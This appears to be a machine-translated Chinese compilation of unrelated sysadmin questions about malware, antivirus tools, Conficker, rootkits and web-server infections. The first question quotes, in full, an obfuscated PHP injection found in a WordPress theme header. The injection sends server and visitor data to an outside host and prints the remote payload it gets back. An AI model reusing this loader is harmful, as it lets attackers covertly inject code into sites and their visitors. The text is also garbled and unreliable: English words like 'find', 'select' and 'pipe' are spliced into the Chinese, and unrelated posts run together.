我们其中一个博客的一些用户已经发现,当在Windows下使用杀毒软件(如Avast或NOD32)加载页面时,会出现一条消息。 信息是这样的 “远程地址已被阻止。”URL:“unloadpupil.org/u4offvzxwifsh2q/”IP地址:64.191.81.117:80 我试图在我的博客数据库上find这个URL或IP,但没有运气,我们的内容没有这个URL的痕迹,所以我非常沮丧的事情真的发生在我们不知道的情况下。 有没有find问题的根源呢? *****更新******** Mangiabuild议的phpAV文件是一种可能的select,但是我已经安装了WordPress Antivirus插件 ,它给了我一个受恶意软件影响的可能文件列表。 在我的网站的主题header.php在它的末尾有以下文本: <?php error_reporting(0); $cf=strrev('edo'.'ced'.'_46esab');$counter=$cf('aHR0cDovL3NpdGVzY3VscHRvci5iaXovbC5waHA/aWQ9').md5($_SERVER['SERVER_NAME']); $data=array('HTTP_ACCEPT_CHARSET','HTTP_ACCEPT_LANGUAGE','HTTP_HOST','HTTP_REFERER', 'HTTP_USER_AGENT','HTTP_QUERY_STRING','REMOTE_ADDR','REQUEST_URI','REQUEST_METHOD','SCRIPT_FILENAME'); foreach($data as $val){$t[]=$_SERVER[$val];}$u=$counter.'&data='.base64_encode(serialize($t));$fn=file_get_contents($u); if(!$fn||strlen($fn)<4){ob_start();include($u);$fn=ob_get_contents();ob_clean();} if($fn&&strlen($fn)>4){list($crc,$enc)=explode('::',$fn);if(md5($enc)==$crc){echo $cf($enc);}} ?> 根据之前StackExchange的消息 ,这可能是恶意软件。 我删除了它,我正在寻找更多的问题。
最近,我的服务器Privoxy规则阻止Facebook的间谍失败。 我怎样才能阻止当前的Facebook间谍链接? 自从Facebook的所谓“Open Graph”跨站点跟踪小部件 (在许多网站上的“Like”错误) 诞生之后不久,我在我们的网站的Privoxy服务器上使用这个规则(在user.action )阻止了它们: { +block-as-image{People-tracking button.} } .facebook.com/(plugins|widgets)/(like|fan|activity).* 这工作正常; 间谍臭虫不再出现在任何网页上。 今天我注意到,他们都是通过filter[ 编辑:不,他们不是 ]。 解决scheme :代理正被默默地忽略,尽pipe这在客户端并不明显。 上述规则继续正常工作。
我想知道是否有一个恶意软件扫描仪的最新漏洞在Apache2.2的Debiannetworking服务器上使用的网站? 漏洞扫描器非常棒,但是我也想确保未被发现的黑客攻击企图通过恶意软件感染我的文件。 我已经使用这些工具来监视我的系统: 蛤蜊AV(反病毒) Paros(漏洞扫描器) 马鹿(弱点扫描仪) Scrawlr(漏洞扫描器) W3af(漏洞扫描器) mod_security的 编辑:我正在寻找像刚刚安装在我的networking服务器上的Sucuri扫描仪 。
我们在两周前通过Conficker进行了testing,在自己的计算机上以及在我们的域名服务器上运行了Mircrosoft的26步清单 。 它说在接近结束扭转所有的变化,但我有点像变化(禁用自动运行和一些其他设置)。 有没有什么东西可以回来让我困扰呢? 另外,也许团体政策从未起作用,我不太清楚。 您的政策是否必须放置在计算机或用户(或者是否重要?
我们的数据中心有基本的服务器端病毒扫描function,但价格昂贵,需要大量的CPU周期,而且很烦人。 我并不是在寻找“更好”的AV软件的销售点,而是更多地寻找社区的脉搏,看看其他人在他们的数据中心里做了些什么。 以下是我们的数据中心的简要概述 – 主要是Windows商店,less量的Web服务器以及大量的SQL Server。 在Web服务器中,只有less数是面向公众的,并且端口限制非常严格 – 端口80和443.没有一个SQL Server面向公众。 就“内部”威胁(用户做愚蠢的事情)而言,我们对权限的限制性很强,所以只有很less的公司可以安装任何服务器端。 其他人都使用网站或客户端工具来访问服务器。 因此,在这种“受保护的”私有数据中心场景中,95%的用户通过客户端工具访问服务器,而且几乎没有公开曝光,是否有强大的情况在所有后端服务器上运行A / V客户端,端服务器还是不?
我喜欢缩写RAT(远程访问特洛伊木马),因为它类似于你需要从厨房中摆脱出来的另一种types的东西,因为当你摆脱掉一个,find它所做的孔并修好这个洞并设置陷阱投入你的时间进入老鼠的头脑,你仍然不能真正摆脱所有,直到你用混凝土重build你的房子。 在.htaccess中,提出一个处理受损服务器的临时措施可能是; RewriteCond %{REQUEST_METHOD} POST RewriteCond %{REMOTE_ADDR} !123.456.789.000 RewriteRule .* /nopost.html [R=301,L] 有些老鼠在你的厨房里偷懒,有些老鼠帮助其他老鼠,还有一些老鼠偷了你的食物。 鉴于access.log显示在这些注入的base64编码文件上发生的POST请求的整个负载,是否正确地假设如上所述的防止POST请求将解决这些有害生物进一步繁殖的问题,更不用说它们将不被允许同时在厨房的地板上发布便便? 或者只是停止老鼠的存款?
什么是最好的恶意软件/间谍软件/防病毒解决scheme? 解决scheme的几个要求: 开源或免费软件 集中pipe理 报告和远程安装 想想Spybot / malwarebytes / highjackthis的业务。 我对Symantec,Trend,McAfee,SonicWALL或任何其他商业产品不感兴趣。
我是纽约州Upstate动物收容所的IT经理。 我们有一个Windowsnetworking,大约有50个运行Windows XP Pro的桌面。 我们曾经使用过CA eTrust Antivirus,但是这个产品工作不好(太多感染了)。 大约六个月前,我们转而使用Symantec Antivirus Corporate Edition ver。 10.1.8.8000。 如果有的话,赛门铁克的产品更糟。 特别是过去的六周,情况非常糟糕 – 我们已经有大约七八台电脑受到那些伪装成反病毒软件的恶意软件感染的打击。 在大多数情况下,赛门铁克甚至没有举报恶意软件。 那么… Symantec Antivirus提供了什么? 据我所知,它已正确安装并每晚下载更新的定义。 我可以以220美元的价格升级到Symantec Endpoint Protection(我们获得非盈利的定价),但是如果它不会更好,我不想这样做。 有什么build议? 我应该完全改用其他的东西吗? 谢谢!
在用户的笔记本电脑上(Windows 7 x64),糟糕的性能让我怀疑rootkit在几乎所有其他事情之外。 我使用Autoruns检查了启动项,并使用Malwarebytes进行了全面扫描,结果都差不多干净了。 我下载了RKR,解压缩,作为pipe理员运行,但它不会打开。 我打开任务pipe理器来检查并尝试重新打开程序。 有时候这个过程甚至不会显示。 有时它会显示大约10秒,列出固定数量的内存,然后死亡。 有一次,我得到了Sysinternals许可协议,但之后就死了。 尝试重命名的EXE,没有骰子。 试过安全模式,没有骰子。 我还没有做的一件事是检查事件日志,我应该这样做。 除此之外,什么机制可能会导致RKR无法启动? 或者是我的系统可能受到攻击,需要从轨道上的核弹?
我有一个CentOS服务器存储Windows用户的文件。 如何在这些文件中扫描Windows病毒,同时防止隔离等措施? 我不希望以任何方式更改文件,并且希望能够纯粹以命令行forms进行可parsing的结果。 我们有一个许可证的杀毒软件是卡巴斯基端点安全。 这是首选的杀毒软件,但这个问题一般适用于Linux反病毒软件。